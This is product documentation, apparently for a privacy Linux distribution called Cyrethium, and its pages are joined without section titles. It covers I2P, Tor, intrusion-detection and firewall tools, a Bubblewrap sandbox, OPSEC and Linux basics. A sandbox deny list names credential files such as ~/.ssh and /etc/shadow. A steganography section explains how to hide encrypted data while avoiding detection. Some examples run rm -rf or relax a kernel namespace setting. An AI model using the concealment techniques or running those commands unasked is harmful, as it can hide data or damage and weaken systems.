RouterInfo & LeaseSets: User reachability information is shared to enable addressing services.

How It Works

1. Each I2P node establishes its own inbound and outbound tunnels by selecting various hops.
2. Communication between two hosts occurs through the intersection of sender's outbound tunnel and receiver's inbound tunnel.
3. I2P addresses are long, base32-like strings resolved via LeaseSet/RouterInfo.
4. I2P continuously renews tunnels and updates routing tables, making tracking difficult.

I2P vs Tor

In-Network Service Focused: I2P excels at accessing anonymous internal services (eepsites). Tor facilitates access to clearnet targets via exit nodes.

Connection Model: I2P establishes asymmetric indirect connections with tunnels; Tor is client-centric with routes established by the client.

Performance: I2P is designed for low-latency applications and service hosting, but varies by use case.

Security Points

Addressing Complexity: I2P addresses are unreadable to humans; incorrect address sharing can easily redirect traffic.

Outproxy Limitations: Exit from I2P to clearnet is limited and generally reduces security/anonymity level.

Overlay Network: I2P is completely an overlay network; node uptime and bandwidth directly affect network performance.

Application Notes for Cyrethium

Be careful when running I2P and Tor simultaneously: different tunneling logic and DNS-like resolution mechanisms can cause confusion.

Overview

NetSecDragon is a comprehensive security toolkit that combines 4 different network security modules in a single interface. It detects DDoS, port scan, MITM, and WiFi deauth attacks.

Modules

• ANTI-FLOOD: DDoS & Flood Detection
• ANTI-SCAN: Port Scan Detection
• ANTI-MITM: ARP & MITM Detection
• ANTI-DEAUTH: WiFi Deauth Detection

Usage

sudo netsecdragon

Note: Root privileges required.

Security Notes

Important:

• Root Required: All modules require root privileges
• Tor Awareness: Automatically ignores Tor traffic
• False Positive: Legitimate high traffic may be detected as an attack

Tips: Adjust thresholds according to your network to reduce false positives.

Overview

OpenMammoth Firewall is an iptables-based firewall providing comprehensive protection against DDoS, port scans, packet manipulation, and various network attacks.

Features

• SYN Flood Protection: Hash-based rate limiting
• Port Scan Protection: Automatic detection and blocking
• Packet Manipulation Protection: Mangle table rules
• Connection Rate Limiting: Connection count limiting
• Anti-Spoofing: Fake IP blocking
• Tor Compatibility: Detects Tor traffic and prevents conflicts
• IPv6 Firewall Support: Full IPv6 security rules

Usage

sudo openmammoth-firewall

Main Menu

1. Enable O.M. Firewall: Enables the firewall and applies all security rules.

2. Disable O.M. Firewall: Disables the firewall and clears all rules.

3. Status O.M. Firewall: Shows firewall status and active rules.

4. Exit: Exits the program.

Tor Detection Mechanism

OpenMammoth Firewall detects Tor usage and prevents conflicts. When Tor is active, enabling the firewall may delete Tor NAT rules, cause traffic not to go through Tor, potentially leak real IP, and make the system unstable.

Important: You must disable OpenMammoth Firewall before routing all traffic to Tor.

Why Does It Conflict with Tor?

• Tor NAT rules are deleted
• Traffic does not go to Tor
• Real IP may leak
• System becomes unstable

Using Tor routing after OpenMammoth Firewall

• Will disable Open Mammoth
• May disrupt Tor traffic and cause internet outages
• You must disable OpenMammoth Firewall before routing all traffic to Tor

Security Notes

CRITICAL WARNINGS:

1. Tor Usage: Stop Tor before enabling firewall
2. SSH Access: Check SSH rules if remotely connected
3. Service Interruption: Some services may be affected
4. IPv6 Protection: IPv6 rules are automatically added
5. Dual-Stack: Both IPv4 and IPv6 are protected

Overview

Plaztek is a user-based lightweight sandbox system designed to safely run untrusted scripts and projects. It creates secure isolated environments using Bubblewrap (bwrap).

Basic Usage

# Simple script execution
plaztek --profile strict suspicious_script.sh

# Directory sandboxing
plaztek --profile medium --dir ~/downloads/ProjectX

# Run with writable mode
plaztek --profile strict --writable --dir ~/myproject -- /bin/bash

# Run without network
plaztek --profile paronid --disable-network script.py

Security Profiles

Basic Profile: Only critical system files are blocked. Minimal restrictions, fast execution, suitable for development.

Medium Profile: Medium security level, suitable for development. Balanced security/performance, most system files protected.

Strict Profile: Tight security for untrusted code. High security level, most system resources blocked, minimal system access.

Paronid Profile: Maximum security with heaviest restrictions. Maximum isolation, all critical resources blocked, minimal system interaction.

Configuration

Profiles: /etc/plaztek.d/profiles/

Custom Configurations: /etc/plaztek.d/

User Configuration: ~/.config/plaztek/config.json

Ephemeral (Temporary) Copying

In writable mode, a temporary copy of the source directory is created. Changes are made only to the temporary copy, and the original directory remains unchanged. The temporary copy is automatically deleted when the sandbox closes.

Network Isolation

Use --disable-network to block all external connections while preserving localhost access. DNS queries are also blocked.

Custom Configuration

Create Custom Configuration:

# Create custom configuration file
sudo nano /etc/plaztek.d/myconfig.conf

Example Configuration:

# One blocking path per line
/home/user/.ssh
/home/user/.gnupg
/home/user/.aws
/home/user/.docker
/etc/shadow
/etc/passwd
/root

Wildcard Usage:

/home/user/.ssh/*
/etc/systemd/*
/var/log/*

List Configurations:

# List all available configurations
plaztek --list-configs

Command Line Options

Basic Options:

• --profile PROFILE: Use security profile (basic|medium|strict|paronid)
• --config NAME: Load configuration file (can be used multiple times)
• --enable-network / --disable-network: Enable or disable network access
• --dir: Sandbox target as directory
• --writable: Create ephemeral copy for write access

Advanced Options:

• --dry-run: Show what would be done without executing
• --list-configs: List all available configuration files
• --bwrap-arg ARG: Pass additional argument to Bubblewrap

Usage Examples

Example 1: Run Untrusted Script

# Run with maximum security
plaztek --profile paronid suspicious_script.sh

Example 2: Inspect Project Directory

# Without network, strict mode
plaztek --profile strict --disable-network --dir ~/downloads/ProjectX

Example 3: Writable Test Environment

# Make changes in temporary copy
plaztek --profile medium --writable --dir ~/myproject -- /bin/bash

Example 4: Custom Configuration

# Multiple configuration files
plaztek --config critical --config services --config security script.py

Example 5: Python Script Analysis

# Strict mode, no network
plaztek --profile strict --disable-network analyze_this.py

Example 6: Development Environment

# Medium profile, writable mode
plaztek --profile medium --writable --dir ~/dev/new-project -- /bin/bash

Troubleshooting

Bubblewrap Not Found

Problem: bubblewrap command not found

# Debian/Ubuntu
sudo apt install bubblewrap

User Namespace Error

Problem: "Unprivileged user namespaces are disabled"

# Temporary enable
sudo sysctl kernel.unprivileged_userns_clone=1

Configuration File Not Found

Problem: "Configuration file not found"

# Check available configurations
plaztek --list-configs

# Use correct configuration name
plaztek --config ssh script.sh

Insufficient Disk Space

Problem: "Not enough space in /tmp for ephemeral copy"

# Clean /tmp space
sudo rm -rf /tmp/plaztek-*

# Or use smaller directory
# Or run without --writable

File Not Found

Problem: "File not found" error

# Use absolute path
plaztek --profile strict /home/user/script.sh

Limitations

1. Root-Required Operations

Plaztek cannot run operations requiring root:

• System services
• Kernel modules
• Privileged ports (< 1024)

2. Hardware Access

Direct hardware access is limited:

• USB devices
• Graphics cards (3D)
• Sound cards (with --nosound)

3. X11 Applications

GUI applications may require additional configuration:

plaztek --bwrap-arg "--ro-bind /tmp/.X11-unix /tmp/.X11-unix" gui-app

Performance Tips

1. Profile Selection

Less restriction = Faster: basic < medium < strict < paronid

2. Ephemeral Copying

Can be slow for large directories. Only use --writable when needed.

3. Configuration Optimization

Remove unnecessary blocking rules.

Frequently Asked Questions

Q: Does Plaztek require root?
A: No, it works with normal user. However, root may be needed to create configuration files.

Q: Can multiple profiles be used simultaneously?
A: No, only one profile or multiple config files can be used.

Q: Can you escape from sandbox?
A: Theoretically not possible, but risk exists if kernel or bubblewrap bugs are present.

Q: What is the performance impact?
A: Minimal. Only a small delay at startup.

Q: What is the difference from Docker?
A: Plaztek is lighter and faster. Docker requires container images, Plaztek does not.

Overview

Riki is an advanced command-line tool that hides and extracts data in image (PNG, BMP, TIFF, PPM, TGA) and audio (WAV) files using LSB (Least Significant Bit) steganography technique.

Commands

1. capacity - Calculate Carrier Capacity

Calculates how much data a carrier file can store.

Usage:

riki capacity -c <carrier_file> [options]

Parameters:

• -c, --carrier (required): Carrier file (PNG/BMP/TIFF/PPM/TGA or WAV)
• -b, --bits: LSB bit count (1-4, default: 1)
• -v, --verbose: Detailed output

Example:

riki capacity -c image.png -b 2 -v

2. embed - Hide Data

Hides a file inside a carrier file.

Usage:

riki embed -c <carrier> -i <input_file> -o <output> [options]

Parameters:

• -c, --carrier (required): Input carrier file
• -i, --input (required): File to hide
• -o, --output (required): Output stego file
• -b, --bits: LSB bit count (1-4, default: 1)
• --compress: Enable zlib compression
• -p, --password: Password for AES-GCM encryption
• --scatter: Randomly distribute data (except header)
• --seed: Seed value for distribution (default: 0)
• --digest: Add SHA-256 verification digest
• -v, --verbose: Detailed output

Example:

riki embed -c photo.png -i secret.txt -o stego.png -b 2 --compress -p mypassword --digest -v

3. extract - Extract Data

Extracts hidden data from stego file.

Usage:

riki extract -s <stego_file> [options]

Parameters:

• -s, --stego (required): Stego file
• -o, --output: Output file path (auto if not specified)
• --overwrite: Overwrite if exists
• -p, --password: Decryption password if encrypted
• -v, --verbose: Detailed output

Example:

riki extract -s stego.png -o extracted.txt -p mypassword -v

4. analyze - Stego Analysis

Shows stego file metadata and header information.

Usage:

riki analyze -s <stego_file> [options]

Parameters:

• -s, --stego (required): Stego file to analyze
• --pretty: Show formatted JSON output
• -v, --verbose: Detailed output

Example:

riki analyze -s stego.png --pretty

Features

Security

• AES-GCM Encryption: 256-bit AES-GCM strong encryption
• Scrypt KDF: Scrypt algorithm for password derivation (N=2^14, r=8, p=1)
• SHA-256 Verification: Data integrity check

Performance

• Zlib Compression: Automatic size optimization
• Multi-LSB Support: 1-4 bit LSB usage
• Scatter Mode: Randomly distribute data to make analysis harder

Supported Formats

• Images: PNG, BMP, TIFF, TIF, TGA, PPM, PNM, PGM, PBM
• Audio: WAV

Technical Notes

• LSB Bit Count: Higher bit count provides more capacity but increases detectability
• Scatter Mode: Header is always sequential, only payload is distributed
• Auto Detection: Extract and analyze commands automatically detect LSB bit count
• Capacity Formula: (carrier_byte_count * lsb_bits) / 8

Error Messages

• Insufficient capacity: Carrier file insufficient, use larger file or higher LSB
• No hidden data found: No hidden data in file or wrong format
• Encrypted payload: Encrypted data requires -p parameter
• SHA-256 digest mismatch: Data integrity compromised

Security Recommendations

1. Strong Password: At least 16 characters, mixed characters
2. Use Scatter: Enable scatter mode to make analysis harder
3. Low LSB: Use 1-2 bits to reduce detectability
4. Digest Verification: Use --digest for data integrity
5. Secure Delete: Securely delete original files

Performance Tips

• Use --compress for large files
• Prefer 3-4 bit LSB for high capacity
• WAV files generally offer higher capacity
• PNG is preferred as it's a lossless format

Tor (The Onion Router) routes network traffic through a series of volunteer-operated nodes using multi-layered encryption (onion-like). Purpose: Weaken the relationship between source (user) and destination (server); making it difficult for third parties to establish identity/location relationships.

Core Components

Entry/Guard Node: The first node the user connects to. Sees the user's real IP address but has no information about the request's destination.

Middle/Relay Node: Carries traffic; bridges between source and destination but doesn't directly see the identity of either side.

Exit Node: Exit point between Tor network and final destination (e.g., web server). Normal (clearnet) connection is made here — the destination sees requests coming from the Tor network.

Directory Servers: Servers that publish the Tor network's node list; clients learn available nodes from here.

How It Works — Step by Step

1. Tor pulls the current node list from directory servers.
2. Client selects a random but policy-compliant route: Guard → Middle → Exit (usually 3 hops). Guard nodes are generally chosen as stable and trusted.
3. Client creates multi-layered (onion) encryption with separate keys for each hop — data consists of nested layers.
4. When sending the packet, each node opens (decrypts) its own layer and forwards to the next node. The last node (exit) opens the final layer and sends the request to the destination (unencrypted or with TLS).

Security/Critical Points

Guard Node Tracking: If an attacker learns the user's guard node, they can make long-term associations. Therefore, clients are cautious in guard selection (rarely change).

Exit Node Surveillance: Exit node can see exit traffic — especially non-HTTPS traffic. Therefore, sensitive data should never be sent without TLS.

Directory Server Manipulation: Fake nodes or directory manipulation can corrupt results; Tor network takes various measures against this but risk is never completely eliminated.

Performance & Privacy Trade-off

More hops = more privacy (theoretically), but latency/bandwidth decreases. Tor is generally suitable for interactive low-bandwidth applications (web browsing); not ideal for heavy traffic/streaming.

Application Notes for Cyrethium

System-wide Tor (forcing all traffic through Tor) is possible with the Cyrethonion tool. Always use HTTPS even over Tor — exit nodes can see traffic.

Introduction — Why OPSEC?

OPSEC is the "art of being cautious" against external threats that target you. Using security tools alone is not enough; wrong habits, misconfigurations, or carelessness can nullify all efforts. Cyrethium provides tools and settings — OPSEC teaches you how to behave.

Basic Principles (Summary)

• Minimum Information Principle: Don't share everything; if possible, share nothing.
• Separation/Segmentation: Separate identity/work/project accounts, devices, and networks.
• Reduce Persistence: Minimize traces; avoid unnecessary data storage.
• Stay Updated: Keep software updated; close known vulnerabilities.
• Act According to Threat Model: There's no one-size-fits-all OPSEC — develop policies based on your target.

Threat Model — Clarify This First

Each threat requires different measures. OPSEC is very different between a simple user and a targeted user.

OPSEC Checklist

• Use unique, long passwords + MFA for accounts.
• Keep personal/work data on separate accounts and devices.
• Anonymize internet access as needed; use anonymity tools consciously.
• Use browser profiles task-based (daily / sensitive / test). Choose the appropriate profile for Cyrethium's Hardened / Amnesic distinction.
• Backup but encrypt backups and restrict access.
• Review features like automatic backup, cloud sync on phone/device.
• Don't open unknown emails, attachments, and links; be suspicious of phishing.
• Physical device security: screen lock, encryption, BIOS/UEFI password, access control.
• Close unnecessary services; develop a habit of monitoring open ports.

Deeper — Behavioral OPSEC

Separate Identities (Compartmentalization)

Don't bridge between personal social accounts, project/work accounts, test/anonymous accounts. Use different email, different browser profile, different session for each identity.

Trace Management

Pay attention to metadata and EXIF when sharing photos/media. Be careful with shareable files — path names, usernames, secret keys, etc.

Communication Security

Choose secure messaging tools; look for end-to-end encryption, device verification, and secure deletion features. If sensitive topics are required, verify the communication channel and identity with the other party in advance.

Device Protocol

When setting up a new device, install only necessary applications; change default passwords/services. Plan for device loss (remote lock, wipe, encryption key storage).

Social OPSEC

Avoid giving sensitive information online/in real life.

Cyrethium-Specific Recommendations

Hardened Firefox

Daily use, extension/performance balance. Use for daily tasks if it comes with sufficient privacy settings.

Amnesic Firefox

For sensitive tasks — for those who want more aggressive cleaning when session closes. However, ease of use may decrease; choose the right browser for the right job.

Tor Routing

Routing all traffic to Tor has benefits and limitations. Tor is a good privacy tool but exit node should be considered; handle sensitive, identity-linking operations carefully on a Tor exit.

Final Word — Mindset

OPSEC is not a toolset, it's a matter of habit. Instead of doing the same routine every morning; think "what traces will I leave today, who sees what, what am I sharing". Cyrethium gives you tools — but the most powerful tool is still your attention.

This document is prepared for users new to Linux systems; it explains basic terminal commands, file paths, permission logic, and system structure in simple language.

Linux File System Logic

In Linux, everything is a file — devices, directories, even RAM.

Path	Description
/	Root directory (where everything starts)
/home	User directories (like /home/emir)
/etc	System configuration files
/bin & /sbin	Basic system commands (e.g., ls, cp, reboot)
/usr	Application files (usually software here)
/var	Variable data (logs, cache, etc.)
/tmp	Temporary files
/dev	Hardware (example: /dev/sda = disk)
/proc	System processes and kernel information
/boot	Kernel, initramfs, and GRUB files
/root	Root user's home directory

Terminal Basics

Command	Description	Example
pwd	Shows current directory	pwd → /home/emir
ls	Lists directory contents	ls -la → including hidden files
cd	Changes directory	cd /etc
cp	Copies file	cp file.txt /tmp/
mv	Moves or renames file	mv test.txt new.txt
rm	Deletes file	rm -rf /tmp/*
mkdir	Creates new folder	mkdir logs
cat	Shows file content	cat /etc/hostname
sudo	Runs privileged command	sudo apt update
chmod	Changes file permissions	chmod +x script.sh

System Information

• uname -a: Kernel version, system information
• lsblk: Lists disks and partitions
• df -h: Shows disk usage
• free -h: Shows RAM usage
• top / htop: Monitors active processes
• whoami: Shows current user
• hostnamectl: Machine name, kernel, architecture info

Permissions and Root

root = system god.

Normal user: lives in /home/user

Root: in /root directory

Switch to root: sudo -i

File permissions example: -rw-r--r-- = owner: write/read, group: read, others: read

Change permissions: chmod 755 script.sh

Network Commands

• ip a: Shows network interfaces
• ping 1.1.1.1: Connection test
• curl ifconfig.me: Shows external IP address
• netstat -tulnp: Shows open ports
• ss -tuln: Modern alternative
• systemctl restart NetworkManager: Restarts network service

Package Management (Debian / Cyrethium)

• apt update: Updates repository list
• apt upgrade: Performs updates
• apt install package: Installs package
• apt remove package: Removes package
• apt autoremove: Cleans unnecessary dependencies
• dpkg -l: Lists installed packages

Process & Service Management

• ps aux: Lists active processes
• kill PID: Terminates process
• systemctl status service: Service status
• systemctl enable service: Enables automatic startup
• systemctl disable service: Disables
• systemctl stop service: Stops service

Logs & Monitoring

• /var/log/syslog: System logs
• /var/log/auth.log: Authentication logs
• /var/log/dmesg: Kernel logs
• journalctl -xe: Detailed system log
• tail -f /var/log/syslog: Real-time log monitoring

Are you an artist? Share your designs, add your own touch to Cyrethium's cyberpunk spirit. Interface themes, wallpapers, posters, or concept drawings... All can be part of the community.

Whether you draw a viper design or create an anonymity scene emerging from the shadows — Cyrethium loves art, especially the original.

Designs are shared on Github and added to the System.

Project Purpose

Each distribution has its own purpose. Cyrethium's goal is to provide persistent privacy and security in daily use — not temporary solutions, but a practical privacy layer for everyday life.

Development Status & Expectations

I develop this project alone; there may be bugs and shortcomings. Sometimes I can't perform adequate testing — that's why bug reports are crucial. I can't progress without feedback; please report any bugs, compatibility issues, or ideas you encounter.

Usage Philosophy

Cyrethium is not a passive "automatically protects everything" system — it requires some manual control. You should use it knowingly; the system cannot magically protect you. You need to use the right tools at the right time.

Versions and Security

Root0 Edition: The strongest version in terms of security. Minimum tools, minimum attack surface. Desktop security is enhanced with Wayland.

Root0 Edition is a good choice for beginners or those with little Linux knowledge.

Usability vs Security

It must be acknowledged that Cyrethium can be sluggish due to its hardening settings. You may need to compromise on ease of use for security. However, based on my experience, Cyrethium is more usable compared to many other hardened distributions; you won't feel most of the hardening in desktop use.

Packaging and Security Decisions

I don't package Cyrethium tools as .deb and there is no official repository. The reason is to reduce supply-chain risks.

This situation can be a bit troublesome for both users and me — installing/removing tools is cumbersome, but it's a conscious choice for security.

Cyrethium is completely Debian-based.

About the Website

I write the documentation section of the website in my own language first, then translate it to English. If you see translation or language errors, please let me know; I'll fix them. I do this to save time and write more detailed documentation.

Closing — A Few Personal Notes

If I have any mistakes, please point them out — there's a lot to learn.

For me, Cyrethium is not just an .iso file. Behind it are thousands of hours of effort, sleepless nights, weeks of struggling with bugs. Until reaching this point, my path was repeatedly blocked — there were people who didn't believe in my project, belittled me, or deliberately made things difficult.

Today Cyrethium is here, because I didn't give up.